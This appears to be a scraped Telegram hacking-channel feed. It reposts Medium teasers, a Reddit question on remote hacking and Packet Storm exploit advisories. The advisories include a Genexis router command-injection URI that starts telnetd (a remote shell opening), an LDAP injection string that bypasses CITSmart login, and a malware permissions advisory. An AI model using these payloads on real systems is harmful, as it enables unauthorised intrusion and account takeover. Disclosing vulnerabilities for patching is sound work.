Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Looking for a Target One Hosting Address

https://cdn-images-1.medium.com/max/1024/0*6MTp8GHVVFSsUU0D.jpg
Assalamu’alaikum all, pa khabar ya ??? The author of your prayers all remain in the protection of Allah SWT who has given kite hidayah so…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hacking the Scammers Portal

https://cdn-images-1.medium.com/max/1517/1*tgzIwd6RW0Bk2OCcxu2m9g.png
How we hacked into the one of the largest scammers portal which was used for creating phishing pages and later for scamming

Continue reading on Medium »
How to move on to Wireless hacking
https://www.reddit.com/r/Pentesting/comments/mqxad0/how_to_move_on_to_wireless_hacking/

<!-- SC_OFF -->I know some reverse enigneering, am okay at binary exploitation and know some networking (The layers, different protocols and the linux socket api). How do I move on from binary exploitation on my local machine to attacking remote computers? I am obviously able to exploit simple buffer overflows in networked programs too since thats not much different from local computers but these types of weaknesses are rare arent they? Does someone have advice for me on remote hacking? I cant seem to find access to this topic. <!-- SC_ON --> submitted by /u/MagisterHegoDamaskII (https://www.reddit.com/user/MagisterHegoDamaskII)
[link] (https://www.reddit.com/r/Pentesting/comments/mqxad0/how_to_move_on_to_wireless_hacking/) [comments] (https://www.reddit.com/r/Pentesting/comments/mqxad0/how_to_move_on_to_wireless_hacking/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Genexis PLATINUM 4410 2.1 P4410-V2-1.28 Remote Command Execution

https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
Genexis PLATINUM 4410 version 2.1 P4410-V2-1.28 suffers from a remote command execution vulnerability.

MD5 | 43aeccc4d2fcad984b051b4cdbb1583f

Download
# Exploit Title: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE
# Date: 12-4-2021
# Exploit Author: Jay Sharma
# Version: Genexis PLATINUM 4410 2.1 P4410-V2-1.28
# Tested on: V2.1
# CVE : CVE-2021-29003

#steps to reproduce#

Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CITSmart ITSM 9.1.2.22 LDAP Injection

https://3.bp.blogspot.com/-4JQvP0m8T2k/WWlu48OEwdI/AAAAAAAAII8/Zf-K1JUBYisUlMBEUhCPF3Gl3BdQ2zG_gCLcBGAs/s1600/h103.png
CITSmart ITSM version 9.1.2.22 suffers from an LDAP injection vulnerability.

MD5 | 4ac23ee971f692bf2ad5ddba1be97403

Download
# Exploit Title: CITSmart ITSM 9.1.2.22 - LDAP Injection
# Google Dork: "citsmart.local"
# Date: 29/12/2020
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.23
# CVE : CVE-2020-35775

To exploit this flaw it is necessary to have at least one user/password previously registered, because the system checks (ldap bind) the first user returned in the ldap search. However, it returns the last user found in the search to the function that called it (logic error).

So, I call this problem an LDAP injection in conjunction with a programming logic error that allows you to authenticate to CITSmart ITSM with another valid user without needing to know the target user's password.

Affected versions: < 9.1.2.23
Fixed versions: >= 9.1.2.23

Using this LDAP query in the username field of login page you could login with the target_username account without knowing the target account password.

*)(|(sAMAccountName=valid_username)(sAMAccountName=target_username)

You must know at least one username/password because the autenticacaoAD() function at LDAPUtils.java class (package br.com.centralit.citcorpore.integracao.ad) will try to bind with the first user (valid_username) of the query result.

Vendor has acknowledge this vulnerability at ticket 5929 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
HEUR.Hoax.Win32.FrauDrop.gen Insecure Permissions

https://4.bp.blogspot.com/-xJ4j9VfFswY/WWlvOf_vUlI/AAAAAAAAIMo/D1-kp_Mj10E1aNmsGMS5n6nKC28DofOXwCLcBGAs/s1600/h25.png
HEUR.Hoax.Win32.FrauDrop.gen malware suffers from an insecure permissions vulnerability.

MD5 | 50c66b4d86576b7c155504ec687423d1

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/1d40e72fb8cf300298df4b828b48ec29.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: HEUR.Hoax.Win32.FrauDrop.gen
Vulnerability: Insecure Permissions
Description: FrauDrop.gen creates an insecure dir named "newdnswatch" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges
Type: PE32
MD5: 1d40e72fb8cf300298df4b828b48ec29
Vuln ID: MVID-2021-0170
Dropped files: config.bin, newdnswatch.exe
Disclosure: 04/13/2021

Exploit/PoC:
C:\>cacls newdnswatch
C:\newdnswatch BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>dir newdnswatch
Volume in drive C has no label.

Directory of C:\newdnswatch

04/11/2021 10:13 PM 5,677 config.bin
02/10/2018 01:21 AM 131,072 newdnswatch.exe
2 File(s) 136,749 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com